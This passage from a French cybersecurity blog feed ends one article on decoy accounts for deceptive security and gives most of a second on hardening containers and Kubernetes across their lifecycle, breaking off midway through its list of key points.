<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><b><span data-contrast="none">R</span></b><span data-contrast="none">isque : 4/4</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><span data-contrast="none">« Dans notre exemple un mot de passe de 64 caractères a été défini ce qui n’est pas cassable dans un temps raisonnable. »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:993,&quot;335559731&quot;:0,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[0]}"> </span></li>
</ul>
</li>
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><b><span data-contrast="none">C</span></b><span data-contrast="none">rédibilité : 3/4</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><span data-contrast="none">« Sous réserve du choix du nom et des attributs du compte en fonction du contexte de production dans lequel il est déployé, l’attaque se basant sur un fonctionnement normal de Kerberos, il ne sera pas étonnant de pouvoir la réaliser. La crédibilité est donc forte. »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:993,&quot;335559731&quot;:0,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[0]}"> </span></li>
</ul>
</li>
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><b><span data-contrast="none">S</span></b><span data-contrast="none">calabilité : 2/4</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><span data-contrast="none">« Le déploiement du compte de leurrage peut se faire automatiquement sur plusieurs domaines grâce à des scripts. Néanmoins pour un leurre efficace, la contextualisation reste primordiale et constituera l’obstacle majeur à un déploiement de masse efficace. Il faudra donc prendre en compte le coût d’apporter cette contextualisation et de la maintenir à jour. »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:993,&quot;335559731&quot;:0,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[0]}"> </span></li>
</ul>
</li>
</ul>
<p style="text-align: justify;" aria-level="1"> </p>
<p style="text-align: justify;"><span data-contrast="none">Pour conclure, les solutions de </span><b><span data-contrast="none">Deceptive Security</span></b> <span data-contrast="none">sont à étudier au cas par cas. Il est impératif d’avoir déterminé au préalable les objectifs à prioriser, la stratégie à adopter, le périmètre concerné etc.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Dans certains cas d’usage, surtout pour les entreprises ayant une sécurité informatique déjà mature, il est pertinent de mettre en place des solutions du type </span><b><span data-contrast="none">Deceptive Security</span></b><span data-contrast="none">. Ceci est à appliquer en complément d’outils de sécurité standards minimums tels que les firewalls, les antivirus, les systèmes de détection et/ou de prévention d’intrusion,&#8230; L’objectif étant de couvrir</span><b><span data-contrast="none"> tous les types de cyberattaques</span></b><span data-contrast="none"> (type « 0-day », sans pattern connu). </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Cette technologie peut être difficile à mettre en œuvre pour les entreprises de petite taille car elles n&rsquo;ont pas forcément les outils de sécurité essentiels mis en place par défaut et ne disposent pas des ressources nécessaires pour configurer (ex : designer les leurres, créer les stratégies et scénarios) et maintenir une telle solution (ex : équipes de maintenance dédiées).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Aujourd’hui, le marché est en expansion, principalement sur les sujets de détection grâce à la Deceptive, mais pas uniquement. L’intérêt des éditeurs à construire des solutions de Deceptive est cependant centré, pour le moment, sur les environnements traditionnels. Les solutions pour le Cloud AWS, Azure, etc., sont encore peu développées.</span><span aria-hidden="true"> </span> <span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559991&quot;:567}"> </span></p>
<p> </p>
<p> </p>
<p> </p>
<p><em>Merci à Augustin TOURNYOL DU CLOS pour sa contribution à cet article.</em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/01/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-strategie-de-leurrage/">Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Stratégie de leurrage</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2024/01/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-strategie-de-leurrage/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Naviguez en toute sécurité : La sécurisation des conteneurs étape par étape </title>
		<link>https://www.riskinsight-wavestone.com/2024/01/naviguez-en-toute-securite-la-securisation-des-conteneurs-etape-par-etape/</link>
					<comments>https://www.riskinsight-wavestone.com/2024/01/naviguez-en-toute-securite-la-securisation-des-conteneurs-etape-par-etape/#respond</comments>
		
		<dc:creator><![CDATA[Elise JOUSSELIN]]></dc:creator>
		<pubDate>Thu, 11 Jan 2024 09:00:00 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Conteneurs]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=22173</guid>

					<description><![CDATA[<p>Les conteneurs représentent une opportunité de déploiement rapide, flexible et efficace des applications. En 2019, 84% des infrastructures de production utilisaient déjà des conteneurs[1]. Comme souvent, cette adoption massive s’est faite sans l’intégration des équipes CyberSécurité, parfois par méconnaissance de...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/01/naviguez-en-toute-securite-la-securisation-des-conteneurs-etape-par-etape/">Naviguez en toute sécurité : La sécurisation des conteneurs étape par étape </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;">Les conteneurs représentent une opportunité de déploiement rapide, flexible et efficace des applications.</p>
<p style="text-align: justify;">En 2019, 84% des infrastructures de production utilisaient déjà des conteneurs<a href="#_ftn1" name="_ftnref1">[1]</a>. Comme souvent, cette adoption massive s’est faite sans l’intégration des équipes CyberSécurité, parfois par méconnaissance de la technologie, parfois par une vision de simplicité et efficacité des équipes de développement.</p>
<p style="text-align: justify;"><strong>Le besoin de sécurisation des conteneurs est plus présent que jamais, il est temps que les équipes Cyber comprennent la technologie pour définir les bonnes mesures de sécurité</strong></p>
<p style="text-align: justify;">Dans un premier temps, nous présenterons une comparaison entre les conteneurs et les machines virtuelles, puis nous reviendrons sur les raisons de l’émergence des conteneurs. Nous verrons ensuite comment les sécuriser tout au long de leur cycle de vie, <strong>étape par étape</strong>.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Machine virtuelle, conteneur : quelle différence ?</h1>
<p style="text-align: justify;">Mais pourquoi choisir un conteneur ? Pour comprendre cela, il faut tout d&rsquo;abord regarder la différence entre une machine virtuelle et un conteneur</p>
<p style="text-align: justify;">La différence principale entre une VM (Virtual Machine) et un conteneur réside dans les éléments inclus dans l’espace virtualisé. Un conteneur contient uniquement l&rsquo;applicatif et les dépendances nécessaires pour son exécution alors qu’une VM contiendra un système d’exploitation sur lequel seront installées une ou plusieurs applications. Un conteneur ne possédant pas de système d’exploitation, il s’appuie sur celui de l’hôte sur lequel il s’exécute. Cette distinction permet de gagner en légèreté et complexité.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22174 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/01.png" alt="" width="532" height="296" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/01.png 532w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/01-343x191.png 343w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/01-71x39.png 71w" sizes="auto, (max-width: 532px) 100vw, 532px" /></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Mais alors, pourquoi les conteneurs ?</h2>
<p style="text-align: justify;">Les conteneurs n’ont pas été développés dans un objectif de<strong> renforcer le niveau de sécurité, mais plutôt pour des besoins d’infrastructure</strong>. Les principaux avantages sont :</p>
<ul style="text-align: justify;">
<li><strong>La</strong> <strong>consistance</strong>: les conteneurs peuvent être lancés sur n’importe quelle machine, ils fonctionneront de la même manière.</li>
<li><strong>L’économie</strong>: les conteneurs sont plus rapides et demandent moins de ressources que les VMs, ils coûtent donc moins cher.</li>
<li><strong>L’automatisation</strong>: il est beaucoup plus simple d’automatiser le déploiement d’un conteneur que la création d’une machine virtuelle (les technologies Cloud ont fait beaucoup de progrès sur ce point depuis).</li>
</ul>
<p style="text-align: justify;">Ces trois avantages, combinés à la popularisation de l’approche DevOps au sein des entreprises, ont fait exploser l’utilisation de conteneurs. Sans pour autant être mise de côté, la sécurité n’a pas été un objectif dans la conception des conteneurs. Ainsi, les bonnes pratiques de sécurité se sont mises en place au fur et à mesure du développement et de l’utilisation de cette technologie.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Les modèles d’exécution</h1>
<p style="text-align: justify;">Les avantages des conteneurs sont liés à un mode de fonctionnement spécifique qui s&rsquo;appuie sur une cinématique d&rsquo;exécution très particulière. Regardons à présent quels sont les modèles d’exécution des conteneurs.</p>
<p style="text-align: justify;">Un conteneur peut être <strong>exécuté sur une machine hébergée on-premise ou dans le Cloud</strong>. Comme expliqué précédemment, un conteneur contient uniquement un applicatif et ses dépendances. Il ne possède pas de système d’exploitation et s’appuie ainsi sur les fonctionnalités de l’hôte. Par conséquent, un conteneur nécessitant des fonctionnalités Linux, devra fonctionner sur une machine au système d’exploitation Linux. Réciproquement, un conteneur requérant des fonctionnalités Windows s’exécutera sur une machine Windows. Cependant, des procédés de virtualisation, comme Hyper-V pour Windows, permettent de s’affranchir de ces contraintes.</p>
<p style="text-align: justify;">Pour exécuter un conteneur sur une machine, il faudra simplement installer un logiciel de gestion de conteneurs (un <em>container runtime</em>). Parmi les plateformes de conteneurs, <em>Docker</em>, <em>lxd</em> et <em>Containerd</em> sont les plus utilisées.</p>
<p style="text-align: justify;">Il est ainsi simple d’exécuter un unique conteneur sur une machine. Cependant, les entreprises possèdent souvent de nombreux d’applicatifs. Un problème se pose alors pour la gestion et la mise à l’échelle des conteneurs à déployer.</p>
<p style="text-align: justify;">C’est à ce moment-là que les <strong>orchestrateurs de conteneurs </strong>entrent en jeu. Un orchestrateur va permettre de gérer facilement le déploiement, la surveillance, le cycle de vie, la mise à l’échelle ainsi que la mise en réseau des conteneurs. Ces orchestrateurs peuvent être configurés sur des <strong>machines on-premise ou à travers des services mis à disposition par les fournisseurs Cloud</strong>. Dans ce second cas, leur mise en place et leur configuration seront facilitées, car elles sont gérées par le fournisseur Cloud. La technologie la plus répandue d’orchestrateur au sein des entreprises est <em>Kubernetes. </em>Il existe aussi de nombreux produits se basant dessus, comme <em>OpenShift</em> par exemple. D’autres alternatives comme <em>Docker Swarn</em> permettent également cette orchestration.</p>
<p style="text-align: justify;">L’infographie suivante résume les modèles d’exécutions ainsi que le nom des technologies ou services :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22176 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/02.png" alt="" width="605" height="235" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/02.png 605w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/02-437x170.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/02-71x28.png 71w" sizes="auto, (max-width: 605px) 100vw, 605px" /></p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Cette grande variété des modes de déploiement permet d&rsquo;adapter au mieux le conteneur au besoin métier.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Focus sur l’orchestrateur <em>Kubernetes </em></h1>
<p style="text-align: justify;">Comme énoncé précédemment, <em>Kubernetes</em> et les produits basés sur cette technologie pour l’orchestration sont les plus répandus. <em>Kubernetes</em> sera ainsi utilisé pour illustrer le fonctionnement d’un orchestrateur. Pour le schématiser simplement, prenons l’analogie d’un port à conteneurs.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22178 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/03.png" alt="" width="603" height="425" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/03.png 603w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/03-271x191.png 271w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/03-55x39.png 55w" sizes="auto, (max-width: 603px) 100vw, 603px" /></p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Considérons tout d’abord les <strong>nœuds worker</strong>. Ce seront <strong>nos bateaux porte-conteneurs</strong>. Ils ont pour vocations de porter la charge, c’est-à-dire d’exécuter les conteneurs de l’orchestrateur.</p>
<p style="text-align: justify;">Kubernetes introduit ensuite le concept de <strong>pods</strong>. Un <strong>pod sera les conteneurs</strong> sur les bateaux. Un <strong>pod est généralement composé d’un unique conteneur</strong>. C’est ce composant qui fait tourner l’applicatif à déployer.</p>
<p style="text-align: justify;">Ensuite, nous avons le <strong>control plane constitué des nœuds master</strong>. Ils sont représentés par <strong>les grues</strong> qui vont dispatcher les conteneurs d’un bateau à un autre selon la charge que chaque bateau peut accueillir. En termes techniques Kubernetes, le nœud master va décider sur quel(s) nœud(s) worker exécuter les pods. Le <strong>nœud master est le point central du cluster</strong>. Il contient toute l’intelligence du cluster. C’est également avec lui qu’on interagit pour administrer le cluster et c’est avec lui que les nœuds worker interagissent pour savoir quelles actions effectuer selon les pods qu’ils exécutent (créer de nouveau, les détruire…).</p>
<p style="text-align: justify;">Pour finir, on aura un <strong>équilibreur de charge </strong>qui sera, dans cette analogie, représenté par les camions acheminant les conteneurs. L’équilibreur de charge permet de répartir la charge de flux entrants entre les pods. Par exemple, si trois pods hébergent le même applicatif, l’équilibreur de charge fera en sorte de répartir les requêtes entre les 3 pour ne pas en surcharger un. L’équilibreur de charge est l’interface entre le cluster et l’extérieur, tout comme les camions font le lien avec l’extérieur du port.</p>
<p style="text-align: justify;">Plus classiquement, voici le schéma technique reprenant les différents éléments<a href="#_ftn2" name="_ftnref1">[2]</a> :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22180 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/04.png" alt="" width="1478" height="902" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/04.png 1478w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/04-313x191.png 313w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/04-64x39.png 64w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/04-768x469.png 768w" sizes="auto, (max-width: 1478px) 100vw, 1478px" /></p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Comment sécuriser le container à toutes les étapes de son cycle de vie ?</h1>
<p style="text-align: justify;">Maintenant que nous avons abordé les notions de base, voyons comment on peut sécuriser tout cela. La sécurité doit s’appliquer à chacun des stades du cycle de vie d’un conteneur. En effet, chaque stade présente des défis et des impacts de sécurité associés.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22182 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/05.png" alt="" width="871" height="457" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/05.png 871w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/05-364x191.png 364w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/05-71x37.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/05-768x403.png 768w" sizes="auto, (max-width: 871px) 100vw, 871px" /></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">L’image est d’abord construite</h2>
<p style="text-align: justify;">La première étape du cycle de vie des conteneurs est de <strong>choisir une image de base</strong>. Une image de conteneur est un ensemble de logiciels légers et de fichiers qui comprend tout ce qui est nécessaire à l&rsquo;exécution d&rsquo;une application : le code, le moteur d&rsquo;exécution, les outils système, les bibliothèques système et les paramètres. Le plus souvent, on va récupérer cette image sur internet. Il existe donc un risque d’utiliser une image d’une source inconnue qui serait déjà compromise (avec une <em>backdoor</em> par exemple).</p>
<p style="text-align: justify;">Ainsi, dans cette première étape, il est primordial de bien choisir la source de son image pour s’assurer de prendre une image de confiance (« <em>Trusted image</em> »). Pour cela, on peut s’appuyer sur des sources de référence comme Docker Hub ou encore proposer un catalogue d’images propre à son entreprise. Dans ce dernier cas, les images sont vérifiées et validées en amont par les équipes sécurité de l’entreprise, on les appelle des « <em>golden images</em> ».</p>
<p style="text-align: justify;">La seconde étape est <strong>d’installer une application sur l’image</strong>. Il existe donc un risque classique de vulnérabilité dans le code de l’application. Les scans de vulnérabilités, la sensibilisation des développeurs et le respect des bonnes pratiques de développement s’imposent ici pour éviter qu’une vulnérabilité ne se glisse dans le code de l’application.</p>
<p style="text-align: justify;">La troisième étape est la <strong>configuration des images</strong>. Il s’agit de configurations par défaut appliquées lors du déploiement des conteneurs. À titre d&rsquo;exemple, un <strong>conteneur est exécuté</strong> avec le compte <strong>root </strong>(ou administrateur système) <strong>par défaut</strong> : ne pas modifier <strong>cette</strong> <strong>configuration représente un</strong> <strong>risque</strong> si le conteneur venait à être compromis. De plus, le fait de mettre le <strong>système de fichier </strong>du conteneur <strong>en</strong> <strong>lecture seule</strong>, permet également de limiter les impacts en cas de compromission. En effet, avec ces deux configurations, un attaquant aura moins de champ libre pour ses actions.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">L’image est ensuite stockée dans un dépôt de conteneurs</h2>
<p style="text-align: justify;">Une fois l’image construite, il faut la stocker pour pouvoir y accéder et la déployer autant de fois qu’on le souhaite. Pour cela on utilise un dépôt de conteneurs qu’il est nécessaire de sécuriser également. En effet, si un attaquant pousse une image vérolée dans le dépôt de conteneur, cette dernière peut être déployée en production.</p>
<p style="text-align: justify;">Plusieurs mesures de sécurité peuvent être mises en place pour sécuriser le dépôt de conteneurs :</p>
<ul style="text-align: justify;">
<li><strong>Restreindre les droits et les permissions </strong>des utilisateurs ou des ressources sur le dépôt pour réduire le risque : seules les personnes ou ressources ayant besoin de « pousser » ou « retirer » une image du dépôt doivent être en droit de le faire.</li>
<li><strong>Restreindre l’exposition réseau</strong>.</li>
<li><strong>Signer les images </strong>déposées pour assurer leur intégrité.</li>
<li><strong>Conserver une trace des actions </strong>effectuées sur le dépôt de conteneurs.</li>
</ul>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">S’ensuit la phase de déploiement de l’image</h2>
<p style="text-align: justify;">Une fois l’image construite et stockée, il faut désormais la déployer pour la rendre accessible.</p>
<p style="text-align: justify;"><strong>Lorsque l’on déploie un conteneur</strong>, on va <strong>déterminer des configurations</strong><strong> selon les cas d’usage</strong>. Certaines configurations permettent ainsi de réduire l’isolation logique existante entre les conteneurs et l’hôte. Par exemple il est possible d’autoriser un conteneur à lister les processus de l’hôte ou encore partager la même carte réseau. La configuration <em>privileged</em>, permet même de faire tomber ces barrières d’isolation et donne aux conteneurs un accès à l’ensemble des fonctionnalités de l’hôte. Ces <strong>configurations, certaines dangereuses, peuvent aboutir à des échappements de conteneur </strong>: c’est-à-dire un attaquant qui est sur un conteneur peut utiliser ces privilèges pour s’échapper et parvenir au système d’exploitation. Une fois sur le système d’exploitation, un attaquant pourra obtenir des informations à partir de fichiers de l’hôte ou initier des déplacements latéraux. En d’autres termes, c’est un pas de plus dans le système d’information.</p>
<p style="text-align: justify;">En termes de recommandation sur le déploiement, il sera ainsi nécessaire dans un premier temps de limiter les dépôts de conteneurs à une liste connue et de confiance. Par la suite, des configurations comme <em>AppArmor</em>, <em>Seccomp</em> ou la désactivation des <em>capabilities</em> Linux permettent de restreindre les appels système et les ressources qui seront utilisées par les conteneurs. Pour finir, il conviendra de configurer le système de fichiers du conteneur en lecture seule (<em>ReadOnly</em>) et d’appliquer le principe de moindre privilège sur les configurations passées aux conteneurs. En d’autres termes, il est <strong>nécessaire de limiter l’utilisation de la configuration <em>privileged </em>ou encore la rupture de certaines isolations </strong>(process, réseau, etc.).</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Enfin le conteneur est exécuté</h2>
<p style="text-align: justify;">Pour ce qui est de l’exécution, nous allons nous concentrer sur les méthodes privilégiées par les entreprises. C’est-à-dire les orchestrateurs, avec souvent <em>Kubernetes</em>, ou bien les services d’hébergement de conteneurs sur le Cloud, les CaaS.</p>
<p style="text-align: justify;">Dans le cas de l’orchestration par Kubernetes, l’objectif sera d’abord de <strong>vérifier la conformité des déploiements de conteneurs</strong> afin d’éviter le déploiement de conteneurs dangereux privilégiés. Ils peuvent provenir d’attaque ou simplement d’erreurs d’administration. Selon les plateformes, on parle des , des <em>SecurityContextConstraint</em> ou encore d’outils externes comme OPA <em>Gatekeeper</em>.</p>
<p style="text-align: justify;">Il est également recommandé de <strong>limiter les flux réseau </strong>au sein du cluster, entre les conteneurs, et sortants du cluster afin de restreindre les déplacements latéraux. Cette restriction peut être appliquée avec des <em>NetworkPolicy</em> ou à nouveau avec des outils externes de micro-segmentation. Pour finir, il sera nécessaire d’avoir une <strong>gestion fine des rôles </strong>et utilisateurs ainsi que d’appliquer un durcissement suffisant sur les machines virtuelles servant de nœuds.</p>
<p style="text-align: justify;">Dans le cas des CaaS, l’infrastructure est gérée par le fournisseur Cloud. En tant qu’utilisateur, le durcissement pourra se faire uniquement par l’activation ou la désactivation de certaines options. Une analyse de chaque solution sera nécessaire pour définir des recommandations précises car Azure, Google Cloud Platform ou encore Amazon Web Services proposent des options différentes.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Pour finir, surveiller l’ensemble des étapes</h2>
<p style="text-align: justify;">Le monitoring des conteneurs est important pour des besoins de debug ou encore de récupération de preuves en cas d’incident. Malheureusement, contrairement à une machine virtuelle, <strong>un conteneur est éphémère</strong>. Ses journaux le sont aussi par conséquent… Dans ce cas, comment faire ?</p>
<p style="text-align: justify;">La supervision pourra se faire à trois niveaux :</p>
<ul style="text-align: justify;">
<li>Au niveau des conteneurs en externalisant les journaux (pour lutter contre le côté éphémère des conteneurs et de ses journaux)</li>
<li>Au niveau de la charge de travail des conteneurs (<em>workload</em>)</li>
<li>Au niveau des infrastructures (les nœuds du cluster par exemple)</li>
</ul>
<p style="text-align: justify;">Cette journalisation collectée pourra être gérée par des équipes SOC Cloud dédiées ou centraliser dans le SIEM de l’entreprise. Par la suite, <strong>des scénarios de détection pourront être créés</strong></p>
<p style="text-align: justify;">Il est important de mentionner que les solutions CaaS ainsi que les <em>Kubernetes</em> managés par un fournisseur Cloud (AKS, EKS, GKE, …) permettent de faciliter la centralisation et l’externalisation de ces journaux.</p>
<p style="text-align: justify;">Cette partie a permis d&rsquo;aborder les bonnes pratiques à respecter et les risques associés à chaque étape du cycle de vie d’un conteneur. Le schéma ci-dessous permet d&rsquo;en faire un résumé :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22184 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/06.png" alt="" width="599" height="370" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/06.png 599w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/06-309x191.png 309w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/06-63x39.png 63w" sizes="auto, (max-width: 599px) 100vw, 599px" /></p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">CWPP, la solution à nos problèmes ?</h1>
<p style="text-align: justify;"><strong>CWPP, Cloud Workload Protection Platform</strong>, est un nouvel outil dont on entend beaucoup parler en ce moment. Mais que permet-il ?</p>
<p style="text-align: justify;">Un CWPP est un outil permettant de surveiller et de détecter les menaces sur les workloads, i.e l’ensemble des services exécutés sur le cloud, et en particulier les conteneurs. Il permet d’assurer une partie de la sécurité tout au long du cycle de vie présenté précédemment. Il est notamment utile pour la détection de secrets et de vulnérabilités dans les librairies des applications, la réalisation d’une revue des accès au dépôt, la vérification des configurations ou encore la gestion de la partie monitoring (collecte des logs, détection et remédiation).</p>
<p style="text-align: justify;">Comme tout outil, le CWPP ne sera pas magique. Il sera nécessaire de le déployer avec ou sans agent suivant les cas de figure que l’on souhaite couvrir. Mais au-delà de l’aspect technique du déploiement, il sera nécessaire de l’intégrer dans le processus de l’entreprise pour que tous les acteurs aient un outil leur permettant d’optimisant la sécurité. Il ne faut donc pas minimiser la charge nécessaire de définition de stratégie, de nouveaux processus et d’accompagnement au changement des acteurs ainsi que l’intégration de l’outil avec les outils utilisés par les développeurs. Par exemple, un développeur souhaitera être informé qu’il doit réaliser une remédiation sur un conteneur sur son outil de gestion des incidents (JIRA, issue dans le Git projet&#8230;) et être en mesure de pouvoir tester son nouveau conteneur depuis sa machine avant même de l’avoir poussé dans le dépôt de conteneur. Les fonctionnalités d’un CWPP sont bien souvent déjà partiellement ou totalement couvertes par des outils existants, sa mise en place peut permettre de centraliser la vision et parfois d’optimiser les coûts de licences.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Les éléments clés de la sécurisation des conteneurs</h1>
<p style="text-align: justify;">Vous l’aurez compris avec cet article, le conteneur est né pour des besoins d’infrastructure. Leur aspect léger et flexible en fait un atout parfait pour les besoins applicatifs actuels. Cette démocratisation induit de nouvelles surfaces d’attaques à protéger et impose donc la prise en compte de la sécurité des conteneurs.</p>
<p style="text-align: justify;">Malheureusement, il n’existe pas un outil ou une unique bonne pratique à respecter. En effet, comme l’article l’illustre, c’est un ensemble d’éléments qui permettent de sécuriser ces boites applicatives. Parmi les bonnes pratiques à respecter, les 5 points suivants sont les éléments clés à retenir :</p>
<ol style="text-align: justify;">
<li style="text-align: justify;"><strong>Contrôler les images :</strong> en utilisant une image de confiance durcie, en sécurisant le code source et en réalisant des scans de vulnérabilités</li>
